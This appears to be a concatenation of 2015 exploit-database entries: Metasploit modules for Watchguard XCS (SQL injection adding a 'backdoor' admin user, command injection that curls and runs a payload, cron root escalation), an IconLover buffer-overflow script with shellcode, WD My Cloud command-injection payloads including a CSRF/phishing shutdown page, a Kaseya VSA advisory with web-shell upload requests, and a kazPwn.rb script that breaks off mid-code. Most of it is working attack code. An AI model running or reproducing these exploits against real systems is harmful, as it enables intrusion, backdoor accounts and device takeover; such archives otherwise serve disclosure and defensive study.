sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS Remote Command Execution',
'Description' => %q{
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
remote attacker may insert a valid web user into the appliance database, and get access
to the web interface. On the other hand, a vulnerability in the web interface allows the
attacker to inject operating system commands as the 'nobody' user.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']),
OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
#Check to see if the SQLi is present
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1'"
})
if res && res.body && res.body.include?('unterminated quoted string')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# Get a valid session by logging in or exploiting SQLi to add user
print_status('Getting a valid session...')
@sid = get_session
print_status('Successfully logged in')
# Check if cmd injection works
test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
# We have cmd exec, stand up an HTTP server and deliver the payload
vprint_status('Getting ready to drop binary on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def attempt_login(username, pwd_clear)
#Attempts to login with the provided user credentials
#Get the login page
get_login_hash = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl')
})
unless get_login_hash && get_login_hash.body
fail_with(Failure::Unreachable, 'Could not get login page.')
end
#Find the hash token needed to login
login_hash = ''
get_login_hash.body.each_line do |line|
next if line !~ /name="hash" value="(.*)"/
login_hash = $1
break
end
sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
if login_hash == '' || sid_cookie == ''
fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
end
login_post = {
'u' => "#{username}",
'pwd' => "#{pwd_clear}",
'hash' => login_hash,
'login' => 'Login'
}
print_status('Attempting to login with provided credentials')
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl'),
'method' => 'POST',
'encode_params' => false,
'cookie' => "sid=#{sid_cookie}",
'vars_post' => login_post,
'vars_get' => {
'f' => 'V'
}
})
unless login && login.body && login.body.include?('<title>Loading...</title>')
return nil
end
sid_cookie
end
def add_user(user_id, username, pwd_hash, pwd_clear)
#Adds a user to the database using the unauthed SQLi
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
})
unless res && res.body
fail_with(Failure::Unreachable, "Could not connect to host")
end
if res.body.include?('ERROR: duplicate key value violates unique constraint')
print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
true
end
def generate_device_hash(cleartext_password)
#Generates the specific hashes needed for the XCS
pre_salt = 'BorderWare '
post_salt = ' some other random (9) stuff'
hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
final_hash
end
def send_cmd_exec(uri, os_cmd, blocking = true)
#This is a handler function that makes HTTP calls to exploit the command injection issue
unless @sid
fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
end
opts = {
'uri' => normalize_uri(target_uri.path, "#{uri}"),
'cookie' => "sid=#{@sid}",
'encode_params' => true,
'vars_get' => {
'f' => 'dnld',
'id' => ";#{os_cmd}"
}
}
if blocking
res = send_request_cgi(opts)
else
res = send_request_cgi(opts, 1)
end
#Handle cmd exec failures
if res.nil? && blocking
fail_with(Failure::Unknown, 'Failed to exploit command injection.')
end
res
end
def get_session
#Gets a valid login session, either valid creds or the SQLi vulnerability
username = datastore['WATCHGUARD_USER']
pwd_clear = datastore['WATCHGUARD_PASSWORD']
user_id = rand(999)
sid_cookie = attempt_login(username, pwd_clear)
return sid_cookie unless sid_cookie.nil?
vprint_error('Failed to login, attempting to add backdoor user...')
pwd_hash = generate_device_hash(pwd_clear)
unless add_user(user_id, username, pwd_hash, pwd_clear)
fail_with(Failure::Unknown, 'Failed to add user account to database.')
end
sid_cookie = attempt_login(username, pwd_clear)
unless sid_cookie
fail_with(Failure::Unknown, 'Unable to login with user account.')
end
sid_cookie
end
# Make the server download the payload and run it
def primer
vprint_status('Primer hook called, make the server get and run exploit')
#Gets the autogenerated uri from the mixin
payload_uri = get_uri
filename = rand_text_alpha_lower(8)
print_status("Sending download request for #{payload_uri}")
download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
vprint_status("Telling appliance to run #{download_cmd}")
send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)
register_file_for_cleanup("/tmp/#{filename}")
chmod_cmd = "chmod +x /tmp/#{filename}"
vprint_status('Chmoding the payload...')
send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
exec_cmd = "/tmp/#{filename}"
vprint_status('Running the payload...')
send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
# It needs 3 minutes wait time
# WfsDelay set to 180, so it should be a Manual exploit,
# to avoid it being included in automations
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
by root's crontab which can be exploited to run a command as root within 3 minutes.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' => { 'WfsDelay' => 180 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
end
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end
def check
#Basic check to see if the device is a Watchguard XCS
res = cmd_exec('uname -a')
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
Exploit::CheckCode::Safe
end
def upload_payload
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
write_file(fname, @pl)
return nil unless file_exist?(fname)
cmd_exec("chmod +x #{fname}")
fname
end
def exploit
print_warning('Rooting can take up to 3 minutes.')
#Generate and upload the payload
filename = upload_payload
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
print_status("Payload #{filename} uploaded.")
#Sets up empty dummy file needed for privesc
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
cmd_exec("touch #{dummy_filename}")
vprint_status('Added dummy file')
#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)
#Cleanup the files we used
register_file_for_cleanup('/var/tmp/badqids')
register_file_for_cleanup(dummy_filename)
register_file_for_cleanup(filename)
end
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=504
The latest version of the Vector.<primitive> length check in Flash 18,0,0,232 is not robust against memory corruptions such as heap overflows. While it’s no longer possible to obviously bypass the length check there’s still unguarded data in the object which could be corrupted to serve as a useful primitive.
To better describe this currently the Vector primitive object (at least on 32 bit) looks something like:
| unguarded length | unguarded capacity | xored length | ... | data |
The problem arises because the capacity is not guarded by the xor, and it’s before the xored length which is guarded. As we know the unguarded length value then if we have a suitable memory corruption vulnerability we could corrupt only the length and the capacity fields leaving the xored length alone. Of course we’d need to corrupt the length back to the same value (otherwise the length guard check would fail). If we set the capacity to be greater than that originally allocated then when a call is made to set the length (using the length Vector property) the runtime will assume the allocation is larger than it is and extend the vector over the end of the original allocation.
This in itself is not enough to serve as a useful primitive as extending the vector also 0’s any data afterwards so it’s not an information leak. However we’ve now got a vector which aliases some other part of the heap. If for example something else was allocated immediately after the vector which we can influence then it’d be possible to write data to that and read it out from the vector, and vice versa. Also depending on the heap type it might be possible to reconstruct heap headers, but it probably isn’t on Windows. As vector objects are now on the system heap it’s a lot harder to exploit. It’s likely that an attacker would need to utilize browser specific heap allocations rather than another flash allocation.
One way of fixing this, at least against buffer overflows, would be to move the xored length before the capacity. In this case the act of overflowing the capacity value would corrupt the guard length leading to the check failure when setting the new length to exceed the existing capacity. This wouldn’t do anything against a heap relative overwrite or a buffer underflow. In that case you could also apply the guard to the capacity field as well. If Vectors are completely moved out from the heap with other objects, as planned, exploiting this would probably be very difficult.
On a related note, it’s still possible to read the length of the vector without triggering the guard check. The length is whatever the unguarded length is set to. This could be used as a way of checking which vector objects have been corrupted by an overflow.
I’ve provided a simple example which allocates a 16k UInt vector. Using a debugger you can modify the capacity then press a key to show that the process doesn’t crash (at least doesn’t crash due to a length corruption). The following instructions are for IE11 with 32 bit tabs (the default even on x64 builds).
1. Load the swf file into IE
2. Attach WinDBG to the IE tab process
3. Search for the data pattern to find the vector using the command “s 0 L?10000000 78 56 34 12 f0 de bc 9a 00 00 00 00”. There should only be one hit.
4. Modify the capacity using the command “ed <address>-0xC 5000” replacing <address> with that found in step 3. Also look at <address>+0n64*0n1024 which will should show other data on the heap.
5. Resume execution in the debugger.
6. Select the flash object in the browser and press the ‘=’ key, you should see a trace message printing the new length.
7. If you return to the debugger and dump the data at <addresss>+0n64*0n1024 you’ll find the memory has been zeroed. Also at <addresss>+0n64*0n1024+3C you should find that the value 0x88888888 has been written to existing allocated memory.
The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10”
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38348.zip
# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested : win XP professional sp2
'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]
#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609
Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45
Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Lybrary option
4. Click the Lybrary and push the Download button
5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide
6. Successful exploitation will open an instance of calc.exe!
'''
#!/usr/bin/env python
#badchars = "\x00\x0a\x0d"
junk = "\x41" * 1039
eip = "\xed\x1e\x94\x7c" #jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled ="\x90"*20
shellcode = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
shellcode += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
shellcode += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
shellcode += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
shellcode += "\xFF\xD3" #=> CALL EBX
shellcode += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX
shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
shellcode += "\xFF\xD3" #=> CALL EBX
packet = junk + eip + nopsled + shellcode + nopsled
file=open('exploit.txt','w')
file.write(packet)
file.close()
# Exploit Title: Western Digital My Cloud Command Injection
# Vendor Homepage: http://www.wdc.com
# Firmware tested: 04.01.03-421 and 04.01.04-422 for the Personal Cloud devices
# Firmware link: http://download.wdc.com/nas/sq-040104-422-20150423.deb.zip
# Exploit Author: James Sibley (absane) ; twitter = @ab5ane
# Blog post: http://versprite.com/og/command-injection-in-the-wd-my-cloud-nas/
# Discovery date: May 10 2015
# Vendor notified: May 12 2015
# Vendor fixed: September 2015 with rolling updates
# Vendor advisory: http://community.wd.com/t5/My-Cloud/Potential-Security-Vulnerabilities-with-My-Cloud-Personal-Cloud/td-p/898578
=======================
| Overview |
=======================
The function "exec_runtime", defined in /var/www/restapi/api/Core/init_autoloader.php, executes programs and scripts on the Linux-based WD My Cloud NAS through the PHP "exec" function. In many instances, user input makes its way into the "exec" function without proper validation and sanitization. Because of this, attackers can hijack the command flow and execute arbitrary commands in the context of the user www-data. The www-data user has unrestricted sudo access so escalating to root and therefore compromising the device is trivial.
This was discovered in the "My Cloud Personal Cloud" device but other models may be affected.
=======================
| Proof of Concepts |
=======================
There are two ways to show this:
Method 1) Using the client application ("WD My Cloud Desktop") upload 2GB file with the following name: $(sudo shutdown -h now).txt
Method 2) a) Authenticate as the administrator @ http://wdmycloud:80
b) Open the following path: /api/1.0/rest/safepoint_getstatus?handle=$(sudo shutdown -h now)&action=update
In both PoCs, observe that the device powers off.
=======================
| Exploit 1 |
=======================
This exploit will make all private folders public. A video demo is in the blog.
1) On a webserver host the following as index.html:
#!/bin/bash
while read share;
do
echo UPDATE UserShares SET public_access=\"true\" WHERE share_name=\"$share\"";" | sqlite3 /usr/local/nas/orion/orion.db;
done < <(bash /usr/local/sbin/getShares.sh private)
2) Upload a 2GB file to the WD My Cloud NAS with the client application ("WD My Cloud Desktop"). Use the following name:
$(sudo curl 192.168.0.226 -o makeAllPublic.sh && sudo bash makeAllPublic.sh).txt
3) After the file uploads, refresh the file list.
=======================
| Exploit 2 |
=======================
<!-- The following PHP script will utilize CSRF and WebRTC to remotely shutdown the My Cloud device. -->
<!-- Assumes zero knowledge of device's internal IP and current authentication state. -->
<!-- Requires that the targeted user has admin rights and is on the same LAN as the My Cloud. -->
<!-- Source for the WebRTC JS code: https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
<?php
if (empty( $_GET['exploit'] ) ) {
echo "<html>";
echo " <form id=\"login_form\" action=\"pwnmycloud.php\" method=\"get\">";
echo " <p>Your WD My Cloud is damaged. Please login to fix this!</p>";
echo " <div class=\"content_row\">";
echo " <label>Username</label>";
echo " <input class=\"NOTEMPTY\" id=\"login_username\" name=\"username\" value=\"\" type=\"text\">";
echo " </div>";
echo " <div class=\"content_row\">";
echo " <label>Password</label>";
echo " <input id=\"login_password\" name=\"password\" value=\"\" autocomplete=\"off\" type=\"password\">";
echo " </div>";
echo " <input id=\"exploit\" name=\"exploit\" value=\"true\" autocomplete=\"off\" type=\"hidden\">";
echo " <input type=\"submit\" value=\"Submit\">";
echo " </form>";
echo "</html>";
die();
} ?>
<!doctype html><html><body onload = "go()"><script>
<!-- Start compressed WebRTC code from https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
function TaskController(e,n){this.numConcurrent=e,this.onDone=n||function(){},this.pending=0,this.queued=[],this.checkTimer=-1}function probeIp(e,n,t){var i=Date.now(),o=!1,c=document.createElement("img"),r=function(){c&&(document.body.removeChild(c),c=null)},u=function(){o||(o=!0,r(),t(e,Date.now()-i<n))};document.body.appendChild(c),c.style.display="none",c.onload=function(){u(!0)},c.onerror=function(){u(!1)},c.src="https://"+e+":"+~~(1024+1024*Math.random())+"/I_DO_NOT_EXIST?"+Math.random(),setTimeout(function(){c&&(c.src="")},n+500)}function probeNet(e,n,t){e=e.replace(/(\d+\.\d+\.\d+)\.\d+/,"$1.");for(var i=5e3,o=new TaskController(5,t),c=1;256>c;++c)o.queue(function(t,o){probeIp(e+t,i,function(e,t){t&&n(e),o()})}.bind(this,c))}function enumLocalIPs(e){function n(n){n in o||(o[n]=!0,e(n))}function t(e){e.split("\r\n").forEach(function(e){if(~e.indexOf("a=candidate")){var t=e.split(" "),i=t[4],o=t[7];"host"===o&&n(i)}else if(~e.indexOf("c=")){var t=e.split(" "),i=t[2];n(i)}})}var i=window.webkitRTCPeerConnection||window.mozRTCPeerConnection;if(!i)return!1;var o=Object.create(null);o["0.0.0.0"]=!1;var c=new i({iceServers:[]});return c.createDataChannel("",{reliable:!1}),c.onicecandidate=function(e){e.candidate&&t("a="+e.candidate.candidate)},setTimeout(function(){c.createOffer(function(e){t(e.sdp),c.setLocalDescription(e)},function(){})},500),!0}function getIPs(e){new TaskController(1);enumLocalIPs(function(n){e(n)})}TaskController.prototype.deferCheck=function(){-1==this.checkTimer&&(this.checkTimer=setTimeout(function(){this.checkTimer=-1,this.check()}.bind(this),0))},TaskController.prototype.check=function(){if(this.pending<1&&0==this.queued.length)return this.onDone();for(;this.pending<this.numConcurrent&&this.queued.length>0;)try{this.pending+=1,setTimeout(function(e){e(function(){this.pending-=1,this.deferCheck()}.bind(this))}.bind(this,this.queued.shift()),0)}catch(e){this.pending-=1,this.deferCheck()}},TaskController.prototype.queue=function(e){this.queued.push(e),this.deferCheck()},document.write=function(e){var n=document.getElementsByTagName("script"),t=n[n.length-1];t.insertAdjacentHTML("beforebegin",e)};
<!-- End compressed WebRTC code from https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
function exploit(ip) {
var ip_part = ip.split(".");
var cidr_24 = ip_part[0] + "." + ip_part[1] + "." + ip_part[2] + ".";
if (ip_part[0] == "192" || ip_part[0] == "172" || ip_part[0] == "10") {
var expFrame = new Array(255);
for (i = 2; i < 40; i++) {
document.write("<iframe id=\"" + i + "\" src=\"http://" + cidr_24 + i +"/api/2.1/rest/local_login?username=" + "<?php echo $_GET['username'] ?>" + "&password=" + "<?php echo $_GET['password'] ?>\" height=0 width=0 style=\"visibility:hidden;display:none\"></iframe>");
};
for (i = 2; i < 40; i++) {
document.write("<iframe id=\"exp" + i + "\" src=\"http://" + cidr_24 + i + "/api/1.0/rest/safepoint_getstatus?handle=$(sudo shutdown -h now)&action=update\" height=0 width=0 style=\"visibility:hidden;display:none\"></iframe>");
setInterval( function(id) {document.getElementById(id).src = document.getElementById(id).src;}, 2000, "exp"+i );
};
};
};
function go() {
getIPs(function(ip) {
exploit(ip);
});
}; </script></body></html>
=======================
| Mitigation |
=======================
An update to the firmware has been released as of 9/28/15.
Additional steps include:
* Don't click on links from websites or people you don't know or trust ;)
* Disable WebRTC in your browsers.
* Restrict access to the My Cloud device to only trusted users that need access to it.
* Disable remote access to the device if it is not used.
* Avoid using the client application until a firmware update has been applied.
Kaseya VSA is an IT management platform for small and medium corporates.
From its console you can control thousands of computers and mobile
devices. So that if you own the Kaseya server, you own the organisation.
With this post I'm also releasing two Metasploit modules ([E1], [E2])
and a Ruby file ([E3]) that exploit the vulnerabilities described below.
A special thanks to ZDI for assisting with the disclosure of these
vulnerabilities. The full advisory text is below, but can also be
obtained from my repo at [E4].
[E1] https://github.com/rapid7/metasploit-framework/pull/6018
[E2] https://github.com/rapid7/metasploit-framework/pull/6019
[E3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/kazPwn.rb
[E4]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vs
a-vuln-2.txt
Regards,
Pedro
============
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib (at) gmail (dot) com [email concealed]), Agile Information
Security (http://www.agileinfosec.co.uk/)
========================================================================
==
Disclosure: 23/09/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be
leveraged seamlessly across IT disciplines to streamline and automate
your IT services. Kaseya VSA integrates key management capabilities into
a single platform. Kaseya VSA makes your IT staff more productive, your
services more reliable, your systems more secure, and your value easier
to show."
A special thanks to ZDI for assisting with the vulnerability reporting
process.
These vulnerabilities were disclosed by ZDI under IDs ZDI-15-448 [1],
ZDI-15-449 [2] and ZDI-15-450 [3] on 23/09/2015.
>> Technical details:
#1
Vulnerability: Remote privilege escalation (add Master Administrator
account - unauthenticated)
CVE-2015-6922 / ZDI-15-448
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
GET /LocalAuth/setAccount.aspx
Page will attempt to redirect, ignore this and obtain the "sessionVal"
value from the page which will be used in the following POST request.
POST /LocalAuth/setAccount.aspx
sessionVal=<sessionVal>&adminName=<username>&NewPassword=<password>&conf
irm=<password>&adminEmail=bla (at) bla (dot) com [email concealed]&setAccount=Create
You are now a Master Administrator and can execute code in all the
managed desktops and mobile devices.
A Metasploit module that exploits this vulnerability has been released.
#2
Vulnerability: Remote code execution via file upload with directory
traversal (unauthenticated)
CVE-2015-6922 / ZDI-15-449
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
First we do:
GET /ConfigTab/serverfiles.asp
which will respond with a 302 redirect to /mainLogon.asp?logout=<sessionID>
Thanks for creating a valid sessionID for us, Kaseya!
POST
/ConfigTab/uploader.aspx?PathData=C%3A%5CKaseya%5CWebPages%5C&qqfile=she
ll.asp
Cookie: sessionId=<sessionID>
<... ASP shell here...>
The path needs to be correct, but Kaseya is helpful enough to let us
know when a path doesn't exist.
A Metasploit module that exploits this vulnerability has been released.
#3
Vulnerability: Remote code execution via file upload with directory
traversal (authenticated)
CVE-2015-6589 / ZDI-15-450
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
Login to the VSA console and obtain ReferringWebWindowId from the URL
(wwid parameter).
Create a POST request as below with the ReferringWebWindowId:
POST /vsapres/web20/json.ashx HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------114052411119142
Content-Length: 1501
-----------------------------114052411119142
Content-Disposition: form-data; name="directory"
../WebPages
-----------------------------114052411119142
Content-Disposition: form-data; name="ReferringWebWindowId"
31a5d16a-01b7-4f8d-adca-0b2e70006dfa
-----------------------------114052411119142
Content-Disposition: form-data; name="request"
uploadFile
-----------------------------114052411119142
Content-Disposition: form-data; name="impinf__uploadfilelocation";
filename="shell.asp"
Content-Type: application/octet-stream
<... ASP shell here...>
-----------------------------114052411119142--
A Ruby exploit (kazPwn.rb) that abuses this vulnerability has also been
been released [4].
>> Fix:
V7 â?? Install patch 7.0.0.33
R8 â?? Install patch 8.0.0.23
R9 â?? Install patch 9.0.0.19
R9.1 â?? Install patch 9.1.0.9
>> References:
[1] http://zerodayinitiative.com/advisories/ZDI-15-448/
[2] http://zerodayinitiative.com/advisories/ZDI-15-449/
[3] http://zerodayinitiative.com/advisories/ZDI-15-450/
[4] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/kazPwn.rb
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJWCm9DAAoJEOToNW8ubuEaXLAQAIXcXSYwxJ5YLD0eyDxSO8z3
Vxmzf1jKqCHgTblKfW2+AaAhV7Z6u0fcjw4axV0TiRCUJgp3RANo2DkEjbrP/Pv2
L4Yk34FM0ijfgg5x6rG7M8496jm91iEYpoYcCpsnqE0ZN1RbQZWmqWjJHpVPcPno
RgjNV/OHGBzaikj5BV1yaJwT/KpvV0IGUDB54ZPto8lEYtqxfYl4+zg39DQ+GlRy
OlU+Bovj/n2AiJ52omdm1JJL3DW6rhto8FH7yRUvBeW3ofgdBHwG4Ynxk3gOAhY3
AvD2uIs5eY5siapb7/kA8RSKKuTUYo/p80hDwhkAzVYwlrkDTl7s9gSPU/KOY04/
ur64fhC/9TTEMONZ5PQdbrL5WSAVRTdcsCDbZ8YCbZxoexPzObhdV1qV99Go8Ny+
pd5WCoziQtrK8r2u6v7dsfJfYnvURG7SdcD15e1oIe4OaZzEsXxbcgLEmbskhdOP
ZmcuzkYqUfpFvaFQ3O8PMtBb8jqpkt76X4Q+0JbVG9nUzwA1nS2xoGw0Ad8NDoUi
Nw5BxwW4Z7zCSHgBI6CYUTZQ0QvZFVZXOkix6+GnslzDwXu6m1cnY+PXa5K5jJtm
/BMO8WVUvwPdUAeRMTweggoXOModWC/56BZNgquxTkayz2r9c7AdEr0aZDLYIxr0
OHLrGsL5XSDW9txZqDl9
=rF0G
-----END PGP SIGNATURE-----
#!/usr/bin/ruby
#
# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
# ===================
# by Pedro Ribeiro <pedrib@gmail.com> / Agile Information Security
# Disclosure date: 28/09/2015
#
# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
#
# execjs and mechanize gems are required to run this exploit
#
# According to Kaseya's advisory, this exploit should work for the following VSA versions:
# VSA Version 7.0.0.0 – 7.0.0.32
# VSA Version 8.0.0.0 – 8.0.0.22
# VSA Version 9.0.0.0 – 9.0.0.18
# VSA Version 9.1.0.0 – 9.1.0.8
# This exploit has been tested with v8 and v9.
#
# Check out these two companion vulnerabilities, both of which have Metasploit modules:
# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448)
#
# This code is released under the GNU General Public License v3
# http://www.gnu.org/licenses/gpl-3.0.html
#
require 'execjs'
require 'mechanize'
require 'open-uri'
require 'uri'
require 'openssl'
# avoid certificate errors
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
# Fixes a Mechanize bug, see
# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
class Mechanize::HTTP::Agent
MAX_RESET_RETRIES = 10
# We need to replace the core Mechanize HTTP method:
#
# Mechanize::HTTP::Agent#fetch
#
# with a wrapper that handles the infamous "too many connection resets"
# Mechanize bug that is described here:
#
# https://github.com/sparklemotion/mechanize/issues/123
#
# The wrapper shuts down the persistent HTTP connection when it fails with
# this error, and simply tries again. In practice, this only ever needs to
# be retried once, but I am going to let it retry a few times
# (MAX_RESET_RETRIES), just in case.
#
def fetch_with_retry(
uri,
method = :get,
headers = {},
params = [],
referer = current_page,
redirects = 0
)
action = "#{method.to_s.upcase} #{uri.to_s}"
retry_count = 0
begin
fetch_without_retry(uri, method, headers, params, referer, redirects)
rescue Net::HTTP::Persistent::Error => e
# Pass on any other type of error.
raise unless e.message =~ /too many connection resets/
# Pass on the error if we've tried too many times.
if retry_count >= MAX_RESET_RETRIES
